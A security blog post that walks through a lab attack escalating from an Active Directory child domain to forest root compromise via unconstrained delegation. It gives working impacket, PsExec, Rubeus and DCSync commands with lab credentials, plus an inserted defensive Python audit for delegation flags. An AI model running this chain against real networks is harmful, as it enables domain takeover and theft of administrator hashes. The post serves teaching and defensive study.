This post walks through a straight line from a child domain foothold to full forest root compromise using unconstrained delegation.

The first thing I want to know in a child domain is who is trusted to impersonate other principals.

impacket-findDelegation north.sevenkingdoms.local/eddard.stark:'P@ssword123!' \
-dc-ip 192.168.66.11

I’m asking Active Directory to explain its trust decisions.

In this case, the output shows that WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL is configured for unconstrained delegation.


The Environment

This is a typical GOAD forest.

  • Forest root domain: SEVENKINGDOMS.LOCAL
    • DC: KINGSLANDING.SEVENKINGDOMS.LOCAL
    • IP: 192.168.66.10
  • Child domain: NORTH.SEVENKINGDOMS.LOCAL
    • DC: WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL
    • IP: 192.168.66.11

The objective is to extract the NTLM hashes for Administrator@SEVENKINGDOMS.LOCAL, the forest root administrator.


Unconstrained Delegation Is a Forest Killer

A server configured for unconstrained delegation caches Kerberos Ticket Granting Tickets for any client that authenticates to it. Those TGTs are stored in LSASS and can be reused to impersonate the original principal.

There is no domain boundary enforcement here.

If a forest root principal authenticates to a child domain server with unconstrained delegation, the forest root TGT is handed over. That is expected Kerberos behavior.
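The flag findDelegation is reporting, and the behaviour this section describes, is the TRUSTED_FOR_DELEGATION bit in a principal's userAccountControl. The following is an added auditing example (not from the original post) that classifies LDAP entries by delegation type and ranks unconstrained non-DC hosts first; the sample records and host names other than WINTERFELL$ are constructed.

```python
# Added example, not part of the original post: audit userAccountControl bits
# for unconstrained delegation, the setting that makes a host cache forwarded
# TGTs. The sample records are constructed; attribute names follow the AD schema.

UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller machine account


def classify_delegation(entry):
    """Return (sAMAccountName, kind, is_dc) for a delegating entry, else None."""
    uac = int(entry.get("userAccountControl", 0))
    is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
    if uac & UF_TRUSTED_FOR_DELEGATION:
        kind = "unconstrained"
    elif entry.get("msDS-AllowedToDelegateTo"):
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            kind = "constrained w/ protocol transition"
        else:
            kind = "constrained"
    else:
        return None
    return entry["sAMAccountName"], kind, is_dc


def audit(entries):
    """List findings, unconstrained member servers first: a DC is already a
    tier-0 asset, but a member server holding forwarded TGTs is an escalation path."""
    findings = [f for f in map(classify_delegation, entries) if f]
    findings.sort(key=lambda f: (f[1] != "unconstrained", f[2]))
    return findings


# Constructed sample shaped like the attributes an LDAP search would return.
SAMPLE = [
    {"sAMAccountName": "WINTERFELL$", "userAccountControl": 0x82000},  # DC + unconstrained
    {"sAMAccountName": "FILESRV01$", "userAccountControl": 0x81000},   # member server + unconstrained
    {"sAMAccountName": "WKS01$", "userAccountControl": 0x1000},        # workstation, no delegation
    {"sAMAccountName": "svc.web", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["CIFS/winterfell.north.sevenkingdoms.local"]},
]

if __name__ == "__main__":
    for name, kind, is_dc in audit(SAMPLE):
        print(f"{name:14} {kind:35} {'DC' if is_dc else 'member'}")
```

Feed it the output of an LDAP query for `(|(userAccountControl:1.2.840.113556.1.4.803:=524288)(msDS-AllowedToDelegateTo=*))` to get the same picture findDelegation gives, with DCs separated from the hosts that should not be trusted this way.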


Setting up

Before you can capture anything, you need code execution on Winterfell. Unconstrained delegation only matters if you can read LSASS on the delegated system.

From the child domain, that is trivial. eddard.stark has local admin on the child DC, so PsExec works.

impacket-psexec north.sevenkingdoms.local/eddard.stark:'P@ssword123!'@192.168.66.11

This drops you into a SYSTEM shell on WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL.

Nothing has been exploited yet. You are simply operating on infrastructure you already control.


Sit and Wait on LSASS

Upload Rubeus to Winterfell and start monitoring LSASS for inbound Kerberos tickets.

Rubeus.exe monitor /interval:5 /nowrap

This is passive. You are just waiting for something important to authenticate to you.


Make the Forest Root Talk to You

Now you need a forest root principal to authenticate to Winterfell. The simplest option is the forest root domain controller itself.

Log on to Kingslanding, then force an outbound SMB connection to Winterfell.

# On KINGSLANDING (192.168.66.10)
dir \\winterfell.north.sevenkingdoms.local\c$

Kingslanding’s machine account just sent its Kerberos credentials to Winterfell.


Capture the Forest Root TGT

Switch back to the Rubeus monitor on Winterfell.

You should now see a new ticket appear. Look closely at the principal. In GOAD, this reliably results in a TGT for Administrator@SEVENKINGDOMS.LOCAL landing in LSASS.

Copy the full Base64-encoded ticket blob.


Turn the Ticket into Access

On Kali, save the Base64 blob to a file and clean it up.

echo "<BASE64_TICKET_BLOB_FROM_RUBEUS>" > admin_parent.b64
tr -d '\n ' < admin_parent.b64 > admin_clean.b64

Decode it and convert it for use with Impacket.

base64 -d admin_clean.b64 > admin_parent.kirbi
impacket-ticketConverter admin_parent.kirbi admin_parent.ccache
export KRB5CCNAME=admin_parent.ccache

DCSync the Forest Root

Run DCSync directly against the forest root DC.

impacket-secretsdump -k -no-pass \
-dc-ip 192.168.66.10 \
SEVENKINGDOMS.LOCAL/Administrator@kingslanding.sevenkingdoms.local

Why This Works

Unconstrained delegation assumes the delegated system is fully trusted. That trust extends across domain boundaries inside a forest.

Once a forest root principal authenticates to that system, Kerberos does exactly what it is supposed to do. There is no exploit and no failure condition.

Categories: Security
